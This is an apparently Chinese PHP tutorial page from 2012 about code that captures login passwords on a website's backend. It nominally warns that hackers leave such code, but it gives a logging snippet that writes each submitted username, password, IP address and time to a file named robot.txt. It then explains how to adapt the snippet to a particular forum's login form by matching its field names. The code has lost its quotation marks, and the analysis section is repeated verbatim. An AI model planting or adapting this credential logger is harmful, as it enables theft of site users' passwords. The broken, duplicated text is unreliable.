php截取后臺(tái)登陸密碼的代碼
更新時(shí)間:2012年05月05日 01:24:13 作者:
php截取后臺(tái)登陸密碼的代碼,很多時(shí)候黑客留了這樣的代碼,大家一定要注意下
if($_POST[loginsubmit]!=){ //判斷是否點(diǎn)了登陸按鈕
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 連起來(lái)賦值給變量$sb
fwrite(fopen(robot.txt,ab),$sb);} //結(jié)果寫(xiě)入一個(gè)文件
下面簡(jiǎn)單分析一下,以華夏的登陸頁(yè)面為例。打開(kāi)bbs.xxx.com/login.php 右鍵查看源碼,CTRL+F搜索action找到登陸的表單。
我只復(fù)制了關(guān)鍵代碼過(guò)來(lái).
<form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action后面的值即是表單提交的地址,里面會(huì)處理登陸,比如判斷密碼是不是正確什么的 method為POST,所以用$_POST接收。
。。。。強(qiáng)大的省略號(hào)。。。。。。
<TR>
<TD height=40>賬號(hào)(<U>U</U>):<BR>
<INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對(duì)應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwuser]
<TR>
<TD height=40>密 碼(<U>P</U>):<BR><INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對(duì)應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwpwd]
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 連起來(lái)賦值給變量$sb
fwrite(fopen(robot.txt,ab),$sb);} //結(jié)果寫(xiě)入一個(gè)文件
下面簡(jiǎn)單分析一下,以華夏的登陸頁(yè)面為例。打開(kāi)bbs.xxx.com/login.php 右鍵查看源碼,CTRL+F搜索action找到登陸的表單。
我只復(fù)制了關(guān)鍵代碼過(guò)來(lái).
<form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action后面的值即是表單提交的地址,里面會(huì)處理登陸,比如判斷密碼是不是正確什么的 method為POST,所以用$_POST接收。
。。。。強(qiáng)大的省略號(hào)。。。。。。
<TR>
<TD height=40>賬號(hào)(<U>U</U>):<BR>
<INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對(duì)應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwuser]
<TR>
<TD height=40>密 碼(<U>P</U>):<BR><INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對(duì)應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwpwd]
您可能感興趣的文章:
- php下使用curl模擬用戶登陸的代碼
- PHP+MYSQL會(huì)員系統(tǒng)的登陸即權(quán)限判斷實(shí)現(xiàn)代碼
- php中通過(guò)curl模擬登陸discuz論壇的實(shí)現(xiàn)代碼
- 一個(gè)簡(jiǎn)單的網(wǎng)頁(yè)密碼登陸php代碼
- 解析如何修改phpmyadmin中的默認(rèn)登陸超時(shí)時(shí)間
- PHP登陸后跳轉(zhuǎn)到登陸前頁(yè)面實(shí)現(xiàn)思路及代碼
- php中session退出登陸問(wèn)題
- PHP函數(shù)分享之curl方式取得數(shù)據(jù)、模擬登陸、POST數(shù)據(jù)
- php+mysql實(shí)現(xiàn)用戶注冊(cè)登陸的方法
- php中的登陸login實(shí)例代碼
相關(guān)文章
PHP實(shí)現(xiàn)可精確驗(yàn)證身份證號(hào)碼的工具類(lèi)示例
這篇文章主要介紹了PHP實(shí)現(xiàn)可精確驗(yàn)證身份證號(hào)碼的工具類(lèi),涉及php針對(duì)字符串的截取、計(jì)算、判斷等相關(guān)操作技巧,并附帶說(shuō)明了身份證號(hào)碼的原理,需要的朋友可以參考下2018-05-05PHP Socket網(wǎng)絡(luò)操作類(lèi)定義與用法示例
這篇文章主要介紹了PHP Socket網(wǎng)絡(luò)操作類(lèi)定義與用法,結(jié)合實(shí)例形式分析了php socket網(wǎng)絡(luò)操作類(lèi)的定義及結(jié)合ajax發(fā)送查詢請(qǐng)求等相關(guān)使用技巧,需要的朋友可以參考下2017-08-08PHP5中虛函數(shù)的實(shí)現(xiàn)方法分享
學(xué)過(guò)C++的人都應(yīng)該知道C++中有個(gè)虛函數(shù)的概念。而在php5中如何實(shí)現(xiàn)這個(gè)虛函數(shù)呢?2011-04-04PHP MVC模式在網(wǎng)站架構(gòu)中的實(shí)現(xiàn)分析
MVC模式在網(wǎng)站架構(gòu)中十分常見(jiàn)。它允許我們建立一個(gè)三層結(jié)構(gòu)的應(yīng)用程式,從代碼中分離出有用的層,幫助設(shè)計(jì)師和開(kāi)發(fā)者協(xié)同工作以及提高我們維護(hù)和擴(kuò)展既有程式的能力。2010-03-03PHP實(shí)現(xiàn)的猴王算法(猴子選大王)示例
這篇文章主要介紹了PHP實(shí)現(xiàn)的猴王算法(猴子選大王),對(duì)比分析了兩種PHP猴王算法,涉及PHP數(shù)組遍歷、判斷、遞歸等相關(guān)操作技巧,需要的朋友可以參考下2018-04-04